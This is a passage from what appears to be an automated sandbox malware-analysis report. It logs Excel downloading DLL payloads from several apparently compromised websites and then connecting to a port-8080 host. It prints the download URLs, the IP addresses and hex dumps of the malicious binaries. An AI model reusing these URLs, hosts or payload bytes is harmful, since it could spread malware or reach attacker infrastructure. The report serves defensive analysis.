                              May 23, 2022 09:12:57.603423119 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:58.117925882 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:59.678014994 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:13:02.408247948 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:13:02.408641100 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:13:03.406755924 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:13:06.558228970 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:13:12.018697977 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:13:12.022205114 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:13:13.236799002 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:13:13.236874104 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:13:13.968890905 CEST4917580192.168.2.2266.71.247.68

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 23, 2022 09:10:53.219748974 CEST5586853192.168.2.228.8.8.8
                              May 23, 2022 09:10:53.591710091 CEST53558688.8.8.8192.168.2.22
                              May 23, 2022 09:10:57.178133965 CEST4968853192.168.2.228.8.8.8
                              May 23, 2022 09:10:57.197616100 CEST53496888.8.8.8192.168.2.22
                              May 23, 2022 09:11:00.364746094 CEST5883653192.168.2.228.8.8.8
                              May 23, 2022 09:11:01.418008089 CEST5883653192.168.2.228.8.8.8
                              May 23, 2022 09:11:01.437613010 CEST53588368.8.8.8192.168.2.22
                              May 23, 2022 09:11:04.926969051 CEST5013453192.168.2.228.8.8.8
                              May 23, 2022 09:11:05.052700996 CEST53501348.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              May 23, 2022 09:10:53.219748974 CEST192.168.2.228.8.8.80x2ee2Standard query (0)learnviaonline.comA (IP address)IN (0x0001)
                              May 23, 2022 09:10:57.178133965 CEST192.168.2.228.8.8.80x2ee2Standard query (0)kolejleri.comA (IP address)IN (0x0001)
                              May 23, 2022 09:11:00.364746094 CEST192.168.2.228.8.8.80xe372Standard query (0)stainedglassexpress.comA (IP address)IN (0x0001)
                              May 23, 2022 09:11:01.418008089 CEST192.168.2.228.8.8.80xe372Standard query (0)stainedglassexpress.comA (IP address)IN (0x0001)
                              May 23, 2022 09:11:04.926969051 CEST192.168.2.228.8.8.80x6607Standard query (0)milanstaffing.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              May 23, 2022 09:10:53.591710091 CEST8.8.8.8192.168.2.220x2ee2No error (0)learnviaonline.com103.171.181.223A (IP address)IN (0x0001)
                              May 23, 2022 09:10:57.197616100 CEST8.8.8.8192.168.2.220x2ee2No error (0)kolejleri.com85.114.142.153A (IP address)IN (0x0001)
                              May 23, 2022 09:11:01.437613010 CEST8.8.8.8192.168.2.220xe372No error (0)stainedglassexpress.com66.71.247.68A (IP address)IN (0x0001)
                              May 23, 2022 09:11:05.052700996 CEST8.8.8.8192.168.2.220x6607No error (0)milanstaffing.com107.189.3.39A (IP address)IN (0x0001)
                              May 23, 2022 09:11:24.828629971 CEST8.8.8.8192.168.2.220xd862No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)
                              May 23, 2022 09:11:24.828629971 CEST8.8.8.8192.168.2.220xd862No error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • learnviaonline.com
                              • kolejleri.com
                              • stainedglassexpress.com
                              • milanstaffing.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.2249173103.171.181.22380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              May 23, 2022 09:10:53.772973061 CEST2OUTGET /wp-admin/qGb/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: learnviaonline.com
                              Connection: Keep-Alive
                              May 23, 2022 09:10:53.993267059 CEST3INHTTP/1.1 200 OK
                              Date: Mon, 23 May 2022 07:10:53 GMT
                              Server: Apache
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:10:53 GMT
                              Content-Disposition: attachment; filename="Jf8.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:10:53 GMT
                              Content-Length: 371200
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc@B
                              May 23, 2022 09:10:53.993318081 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: H\$Hl$Ht$WH0IHH
                              May 23, 2022 09:10:53.993345976 CEST6INData Raw: c7 45 f4 27 4c 03 23 c7 45 f8 93 03 41 1d c7 45 fc 09 3a 50 74 c7 45 00 fe 27 4e 38 c7 45 04 31 3e 23 4a c7 45 08 b3 10 75 4a c7 45 0c 40 2c 3a 0c c7 45 10 f1 35 75 13 c7 45 14 50 06 0d 4b c7 45 18 ac 04 e3 73 c7 45 1c 08 23 20 80 c7 45 20 20 c1
                              Data Ascii: E'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EHAELPEP"_ET<3EX39E\xE`]^Ed@Eh2('El -EpD|_Et/1Ex{;E|3
                              May 23, 2022 09:10:53.993374109 CEST8INData Raw: 02 00 00 36 24 12 2d c7 85 38 02 00 00 ee 70 95 0c c7 85 3c 02 00 00 0c 52 02 90 c7 85 40 02 00 00 14 8e 07 3b c7 85 44 02 00 00 24 04 53 8a c7 85 48 02 00 00 13 f9 55 14 c7 85 4c 02 00 00 15 db 41 dc c7 85 50 02 00 00 a5 6c 4f 29 c7 85 54 02 00
                              Data Ascii: 6$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAipN7#6tY&xV|?-mDDCw_>zT
                              May 23, 2022 09:10:53.993402958 CEST9INData Raw: 85 4c 04 00 00 64 1e ea 16 c7 85 50 04 00 00 88 48 ea da c7 85 54 04 00 00 c1 3e 74 54 c7 85 58 04 00 00 10 89 e4 c6 c7 85 5c 04 00 00 c3 d9 36 71 c7 85 60 04 00 00 51 17 b1 18 c7 85 64 04 00 00 9d 6c 68 36 c7 85 68 04 00 00 3b a8 23 ae c7 85 6c
                              Data Ascii: LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\Ng(kjQCeMh5cjAkt}8#5
                              May 23, 2022 09:10:53.993429899 CEST10INData Raw: 22 c7 85 64 06 00 00 e7 0c 61 dc c7 85 68 06 00 00 97 ff 9c 44 c7 85 6c 06 00 00 74 89 4a 4d c7 85 70 06 00 00 56 ba c7 30 c7 85 74 06 00 00 52 91 79 69 c7 85 78 06 00 00 b4 60 e6 4d c7 85 7c 06 00 00 eb 64 ea 05 c7 85 80 06 00 00 dc 57 24 42 c7
                              Data Ascii: "dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'aPKxI)5JgWTQv}Np}3
                              May 23, 2022 09:10:53.993458033 CEST12INData Raw: c4 12 48 c7 85 7c 08 00 00 d4 ec 01 5a c7 85 80 08 00 00 a6 af 70 56 c7 85 84 08 00 00 96 0c b5 91 c7 85 88 08 00 00 56 16 3f ae c7 85 8c 08 00 00 89 78 9c 98 c7 85 90 08 00 00 2e 3e a1 14 c7 85 94 08 00 00 77 82 20 4e c7 85 98 08 00 00 ad a3 6a
                              Data Ascii: H|ZpVV?x.>w NjI"WzA8#'4+kAkD}LhH#FUWM6|jb(/N
                              May 23, 2022 09:10:53.993484974 CEST13INData Raw: 98 16 c7 85 90 0a 00 00 da 7c 50 57 c7 85 94 0a 00 00 98 3f 36 8d c7 85 98 0a 00 00 59 fa 22 70 c7 85 9c 0a 00 00 10 d8 76 76 c7 85 a0 0a 00 00 2b 2b a3 ca c7 85 a4 0a 00 00 6f b4 28 52 c7 85 a8 0a 00 00 94 ac 67 7e c7 85 ac 0a 00 00 a8 00 a2 69
                              Data Ascii: |PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3FH$A@A0H$L$HHHt3AH
                              May 23, 2022 09:10:53.993510962 CEST14INData Raw: 07 33 c0 e9 a9 01 00 00 e8 5e 09 00 00 85 c0 75 0c e8 f5 54 00 00 33 c0 e9 94 01 00 00 e8 f9 53 00 00 ff 15 6b ec 01 00 48 89 05 9c b3 02 00 e8 77 52 00 00 48 89 05 d8 8f 02 00 e8 3b 42 00 00 85 c0 7d 11 e8 f2 09 00 00 e8 bd 54 00 00 33 c0 e9 5c
                              Data Ascii: 3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DPH=]u<eH`+TH|$`u={{t
                              May 23, 2022 09:10:53.993540049 CEST16INData Raw: 00 8b 40 48 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 88 00 00 00 8b 00 39 44 24 30 0f 83 b6 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00 00 8b 44 01 04 48 39 44 24 68 0f 82 92 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c
                              Data Ascii: @HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$xHD$pH$HL$8T$pD$H|$H}3|$H
                              May 23, 2022 09:10:54.141078949 CEST17INData Raw: 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 76 f7 01 00 48 89 88 a0 00 00 00 48 8b 44 24 30 c7 40 10 00 00 00 00 48 8b 44 24 30 c7 40 1c 01 00 00 00 48 8b 44 24 30 c7 80 c8 00 00 00 01 00 00 00 48 8b 44 24 30 c6 80 74 01 00 00 43 48 8b 44 24 30 c6 80
                              Data Ascii: H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuHD$0H"xHHD$0HzT?TH(


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.224917485.114.142.15380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              May 23, 2022 09:10:57.229271889 CEST393OUTGET /wp-admin/REvup/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: kolejleri.com
                              Connection: Keep-Alive
                              May 23, 2022 09:10:57.325115919 CEST395INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 23 May 2022 07:10:57 GMT
                              Content-Type: application/x-msdownload
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/7.4.29
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:10:57 GMT
                              Content-Disposition: attachment; filename="4HWP0KQI.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b338146fc9=1653289857; expires=Mon, 23-May-2022 07:11:57 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:10:57 GMT
                              Vary: Accept-Encoding,User-Agent
                              Content-Encoding: gzip
                              Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 7c 53 c5 f6 00 8e df a4 09 84 d2 92 00 2d 94 3d 40 81 22 5b 15 d4 22 54 53 2c 7a 2b 05 0b 02 56 45 2d b2 55 41 ad 90 40 55 40 6a 5a a5 86 6a 55 54 f4 b9 e0 8e 3b 4f 11 81 87 da 02 92 82 f8 44 dc d0 87 8a fb 8d 41 c5 95 ba 35 ff b3 cc dc 7b 73 93 a2 be f7 fd fd ff ff cf ff f3 e7 3d 9b 73 67 3d 73 e6 cc 99 33 33 67 ce 4c 3c b7 5e 49 51 14 c5 01 ff c5 62 8a b2 49 e1 7f 3e e5 cf ff 69 f0 5f 87 3e 5b 3a 28 1b da bd d6 77 93 ad f8 b5 be 53 cb 2f 5e e4 ad 58 78 f9 bc 85 33 2f f5 ce 9a 79 d9 65 97 fb bd 17 cd f1 2e 0c 5c e6 bd f8 32 6f e1 99 67 79 2f bd 7c f6 9c e1 e9 e9 a9 d9 a2 8c 3b 9f 6b 9b f7 c1 be 8b e7 cb ff 9e 7d 68 fb fc 20 fd 1e 99 ff 2e fc be f5 f8 af f3 df a7 b8 f2 f9 d5 14 be 6d fe cf f4 fb fd fc 03 f4 fb 83 f8 fd 91 7e a7 5c 3c ab 1c cb b1 e2 5a 32 5e 51 66 5f d7 46 f9 e9 ea eb 2f 92 61 87 95 7e de f6 f6 54 68 bc 5d 51 1e 48 a1 b0 15 c7 c3 1f 0f 83 36 45 c0 10 ed c4 3f 8a f1 ab 28 6d 88 68 e1 5e 6d 20 c4 67 93 99 e4 4f e2 37 83 eb 1f b7 2b d5 f0 fb d9 fd 76 a5 84 42 53 94 df 23 50 e6 61 bb b2 c7 6d 42 f8 b0 53 59 6d 57 fe fe 3f af 5d 59 73 94 7c c3 fd 73 2a fd f0 fb 6b 8a 9d 11 c2 b6 3b 2c 45 28 4a d9 f0 85 b3 67 fa 67 2a ca a8 10 97 a9 ac 82 5f 57 7c c1 3e f8 ff 70 4e a6 ac 39 11 1b 07 f1 19 f0 bb 3a 21 5d c3 f0 0a 4e 48 6d 3c 2c ea 5e 97 a4 bc 85 8b 16 ce 02 98 68 82 9c f9 15 fc 6e 4a 96 6e ce 82 cb 21 e1 ef 6d 14 a2 95 e2 82 df 07 9c d6 74 e3 5a a7 c4 ff ff 1f fe 53 6b 67 64 bb d4 da 05 d9 1e b5 d6 9f 9d 75 b6 1a 3c 94 5b 14 da af 86 be 57 43 91 58 e6 d7 6e bb 32 7e e4 ae e2 d0 2b 05 75 93 6d a1 26 48 9d 83 09 bd b1 cc dd 10 35 b2 41 0d ee 8a a9 a1 96 ef 9f 56 43 db d5 23 6f a8 b1 5d ea 90 46 35 d8 6c 5f d4 76 93 d3 a7 ac 88 e6 ee 74 1c eb 55 63 8d 6a dd d8 63 87 bc 17 cb fc 87 5e 62 a8 09 ca b4 73 89 4b b1 c4 0a 2e 31 34 23 db a7 86 16 64 ab 6a c8 9f 5d a2 06 77 e4 5e b8 7d 8f fc 47 f8 22 96 25 6a c8 79 f6 7d 76 45 1d b9 43 ad 2d c4 c4 5b b3 57 60 83 42 bb d5 d0 fb b1 29 9e e2 ba e2 ec bc 82 4d 1e 0a db ab d6 15 66 e7 aa a1 57 31 ad 37 76 56 56 4d 83 5f 20 d8 33 b8 34 3b d7 13 f8 be 38 54 9d bd 12 13 63 3e 35 f4 ae f6 71 4b 0c 9a 56 0c 45 8f dc a3 4d ed 8b c5 cc c8 2e 03 7c 4a 92 e1 53 06 f8 84 ef d5 f1 29 41 7c ea 93 e0 e3 fa 33 7c 72 11 1f 57 e0 7b b5 6e 2a
                              Data Ascii: 1faa|S-=@"["TS,z+VE-UA@U@jZjUT;ODA5{s=sg=s33gL<^IQbI>i_>[:(wS/^Xx3/ye.\2ogy/|;k}h .m~\<Z2^Qf_F/a~Th]QH6E?(mh^m gO7+vBS#PamBSYmW?]Ys|s*k;,E(Jgg*_W|>pN9:!]NHm<,^hnJn!mtZSkgdu<[WCXn2~+um&H5AVC#o]F5l_vtUcjc^bsK.14#dj]w^}G"%jy}vEC-[W`B)MfW17vVVM_ 34;8Tc>5qKVEM.|JS)A|3|rW{n*
                              May 23, 2022 09:10:57.325160980 CEST396INData Raw: d0 01 33 c5 32 2f eb 60 57 20 c5 87 88 e3 1a 81 a3 0f 71 cc 17 38 96 20 8e eb bd 8c 63 05 e0 58 26 70 44 fc 44 d7 8e fc 0f f5 ea 2f 6a cd ae 40 07 a6 73 16 92 d8 7b e1 76 75 56 c1 58 62 82 d0 2a 17 d1 20 e5 f5 d0 c5 3d 0b 43 45 de c2 d0 e4 6c 35
                              Data Ascii: 32/`W q8 cX&pDD/j@s{vuVXb* =CEl5S='!9Yk0wO5SAVY{UMiwosoLShkEFGQprD_f@a{-(D={|uOf:=y=5 c@5A:qG|;f/
                              May 23, 2022 09:10:57.325176954 CEST397INData Raw: 1e bb 73 f9 af e1 9a 72 80 7a 2d 49 83 7a 17 00 f4 ed 53 a7 fa c2 35 15 00 cd 1f 90 7d 51 b8 c6 0f d0 6a f7 a1 76 e1 9a 4a 80 8a cb e6 6c 0a d7 2c 45 4c 4f 7d aa 10 f8 0f a0 53 97 4c 05 da 57 03 74 c5 d4 6e bf 01 ff 01 34 f3 e2 c5 50 c7 2a 80 76
                              Data Ascii: srz-IzS5}QjvJl,ELO}SLWtn4P*v=m?@uW_AZT[C6e-@Ob;/k~q\?1%<t+1s<pNR Lohm@o?*evu}z?lE:g
                              May 23, 2022 09:10:57.325192928 CEST399INData Raw: ef 03 9f 8e 05 68 d9 c5 cf 6e 07 fe 03 e8 e2 71 57 c1 0c 51 08 d0 b3 17 74 be 07 f8 0f 71 fe f7 63 30 07 14 63 de de 5f 41 7b 4b 00 5a a9 7e 05 18 4c 05 a8 f1 64 3f c8 9c 52 07 ca 9c cf 60 d4 ce 00 68 fb 7b 27 5c 01 fc 07 d0 e4 ae ff 04 3e 9d 0d
                              Data Ascii: hnqWQtqc0c_A{KZ~Ld?R`h{'\>=A4fco{R(.1Jn@D*?>wj3<io HzX|!n.)8u^xzY@I]e=ufM.hV
                              May 23, 2022 09:10:57.325211048 CEST400INData Raw: c3 7a 8b 8f 85 35 36 ee 6a cf 79 61 26 e4 50 da c2 2a f5 ed f3 40 de 3b 00 3a 30 e0 44 90 75 2e 80 3e a8 5b 0e ba 59 1a 40 2b ba 3a ca 81 ff 00 ea d2 b7 3f 70 4e 06 40 4f cc 3c 67 1a f0 1f 40 d3 8f bb 05 7a a1 27 40 1f f7 c4 b5 95 17 a0 a5 25 8f
                              Data Ascii: z56jya&P*@;:0Du.>[Y@+:?pN@O<g@z'@%\[LC=vVOXO:A;ft@b'4`tGmq]|#id:S@2?~6@EoQ}@gz
                              May 23, 2022 09:10:57.325227022 CEST401INData Raw: b3 96 01 47 6c 05 a8 ff e2 63 60 56 6b c0 3a ae 3c 19 56 9a 3b 00 72 77 7f 04 5a d4 04 90 b7 31 00 32 67 4f 3b 94 98 9f 02 e7 ec 05 e8 d4 d3 db e0 fe 1f e2 b7 a9 00 d6 a1 fb db e1 8e c8 14 98 fd 0e 00 34 fd 0a 1c b5 07 01 7a e1 1f c7 c0 a8 fd 0c
                              Data Ascii: Glc`Vk:<V;rwZ12gO;4z15?P0(r\zH3}W:P ]M@@GD`IEMwD?Q=Lm/G/b~$Px\=-xRyu
                              May 23, 2022 09:10:57.325242043 CEST402INData Raw: 40 3c cb d3 7e 39 0b e5 d1 fc 43 36 14 1c 77 3f 67 57 b4 25 53 50 40 38 f7 df 04 f0 98 71 98 65 59 47 ed 7b c8 ab bd c8 f9 f0 3c 52 eb 5b 8c 31 4b 33 b4 4d 45 04 b4 1f b9 4b 7b 6a 0c 82 fe 2e da 0e 15 52 bc 8c 59 6e e0 2c 83 21 0b 89 4a ed 9c 31
                              Data Ascii: @<~9C6w?gW%SP@8qeYG{<R[1K3MEK{j.RYn,!J15:o-J`~)(CLTT7mpjBsx!P|=6Lt_}5;5BG.Q8Gq]@N<a4@"@?Gnn(;9*jE16
                              May 23, 2022 09:10:57.325258017 CEST404INData Raw: 31 66 61 30 0d 0a 64 fe ac 3a b4 8e 50 aa ce 6e a2 5f 1f cd 4c 95 46 40 31 7e 28 68 59 c8 f8 ea 09 f3 d4 5a 41 0b 08 43 9b 97 90 cf 11 3c 38 b7 a6 c1 4d e7 f5 32 54 e5 99 b5 3a bb 41 7c f8 64 19 21 ea 85 dc 68 2a 0e 67 90 57 34 21 72 91 21 65 34
                              Data Ascii: 1fa0d:Pn_LF@1~(hYZAC<8M2T:A|d!h*gW4!r!e4~<8Vq\Bt[G8:(ItpKGhhTLRtRC7I4Sei0(SA|#AU7~aTUEq@+9iyHw2 .60]K 1T,SRP
                              May 23, 2022 09:10:57.325274944 CEST405INData Raw: b2 e7 45 14 70 7c 37 46 6a 39 f5 72 b4 21 b7 30 a5 59 59 40 c5 11 47 f4 c8 7d 62 6b 77 ed 7c bc 5d 13 58 aa 06 f9 ca 8e e2 cf 6f ad 2c 68 d9 be 8f 8c 96 c1 c2 6f e4 3e 58 a6 6d 9c 67 34 27 3a 02 12 d5 88 44 98 e1 8a 24 19 6a 4c 19 22 68 75 29 d4
                              Data Ascii: Ep|7Fj9r!0YY@G}bkw|]Xo,ho>Xmg4':D$jL"hu)x3lgB/whAu'OVE+d-~h0Zj_ sEqlH6D+rcET8$&,$QxLKW [C3,_Se<'{h/k-T"fe
                              May 23, 2022 09:10:57.325320959 CEST406INData Raw: 84 10 0f 84 2b df 94 03 e1 a3 99 e6 a1 a7 e7 6c cb 43 2c 95 4e fa 23 b9 62 9b 06 68 96 a7 f8 bb 0a 1c 58 85 51 43 45 2e d2 29 8b 45 76 67 e1 12 3b 8f c1 4f df 34 57 7d 37 57 dd b2 4f 56 3d db 52 75 29 9f e2 38 1d 4b f4 1e aa 74 29 fe 2e 46 1c d7
                              Data Ascii: +lC,N#bhXQCE.)Evg;O4W}7WOV=Ru)8Kt).FY7Emq=\P3IQ~tT],t3CQybT(\jV1"]qS@I2i+yB1SAZ,tb=Hx}fR EC9}*3nC
                              May 23, 2022 09:10:57.353770018 CEST408INData Raw: 87 79 b9 84 5b 1b fa fd ff a1 d6 da 5f 4d 44 b2 a5 f8 bf 68 ed e0 dd 89 05 3d 5f dc 4a 6b 81 13 14 77 cd bf 8c c6 88 06 14 87 0a bc d0 ea 57 cf e4 56 df f6 1b b7 fa 96 f8 56 4f 4c d6 ea bc b8 56 e7 4a b4 be 4f d2 9b bd cd ed 3b 36 ae 7d 98 65 44
                              Data Ascii: y[_MDh=_JkwWVVOLVJO;6}eD,-i]-9KW%hy~A(U=!,HcA{$HgL4wgIYKbdU`K@dFN{<K]f,;9N'Lc$:~UNhOsJtiH.


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.224917566.71.247.6880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              May 23, 2022 09:11:01.574974060 CEST647OUTGET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: stainedglassexpress.com
                              Connection: Keep-Alive
                              May 23, 2022 09:11:01.798887968 CEST648INHTTP/1.1 200 OK
                              Date: Mon, 23 May 2022 07:11:01 GMT
                              Server: Apache
                              X-Powered-By: PHP/7.3.33
                              Cache-Control: no-cache, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 23 May 2022 07:11:01 GMT
                              Content-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"
                              Content-Transfer-Encoding: binary
                              Set-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/
                              Last-Modified: Mon, 23 May 2022 07:11:01 GMT
                              Content-Length: 371200
                              X-Content-Type-Options: nosniff
                              Vary: User-Agent
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 